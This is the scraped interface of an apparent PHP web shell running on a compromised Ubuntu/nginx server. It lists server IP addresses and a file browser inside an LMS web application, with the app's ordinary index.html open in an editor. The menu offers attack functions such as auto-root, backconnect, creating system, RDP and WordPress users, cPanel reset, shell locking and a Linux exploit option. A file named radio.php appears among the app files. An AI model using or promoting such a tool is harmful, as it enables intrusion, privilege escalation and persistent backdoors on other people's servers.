Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-client /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
containers
[ DIR ]
drwxrwxr-x
helpers
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
service
[ DIR ]
drwxrwxr-x
styles
[ DIR ]
drwxrwxr-x
translations
[ DIR ]
drwxrwxr-x
types
[ DIR ]
drwxrwxr-x
ui
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
.htaccess
1.75
KB
-rwxrwxr-x
.nginx.conf
3.21
KB
-rwxrwxr-x
app.tsx
3.77
KB
-rwxrwxr-x
configureStore.ts
2.21
KB
-rwxrwxr-x
global-styles.ts
658
B
-rwxrwxr-x
globals.d.tsx
214
B
-rwxrwxr-x
i18n.ts
1.26
KB
-rwxrwxr-x
index.html
1.11
KB
-rwxrwxr-x
locales.ts
95
B
-rwxrwxr-x
radio.php
3.78
KB
-rw-r--r--
radio.txt
40
B
-rw-r--r--
reducers.ts
3.76
KB
-rwxrwxr-x
saga.tsx
2.72
KB
-rwxrwxr-x
utils.d.ts
74
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <!-- The first thing in any HTML file should be the charset --> <meta charset="utf-8" /> <!-- Make the page mobile compatible --> <meta name="viewport" content="width=device-width, initial-scale=1" /> <!-- Allow installing the app to the homescreen --> <meta name="mobile-web-app-capable" content="yes" /> <link rel="icon" href="/favicon.ico" /> <title>LMS</title> </head> <body> <!-- Display a message if JS has been disabled on the browser. --> <noscript >If you're seeing this message, that means <strong>JavaScript has been disabled on your browser</strong>, please <strong>enable JS</strong> to make this app work.</noscript > <!-- The app hooks into this div --> <div id="app"></div> <!-- A lot of magic happens in this file. HtmlWebpackPlugin automatically injects all assets (e.g. bundle.js, main.css) with the correct HTML tags, which is why they are missing in this file. Don't add any assets here! (Check out webpack.dev.babel.js and webpack.prod.babel.js if you want to know more) --> </body> </html>
Close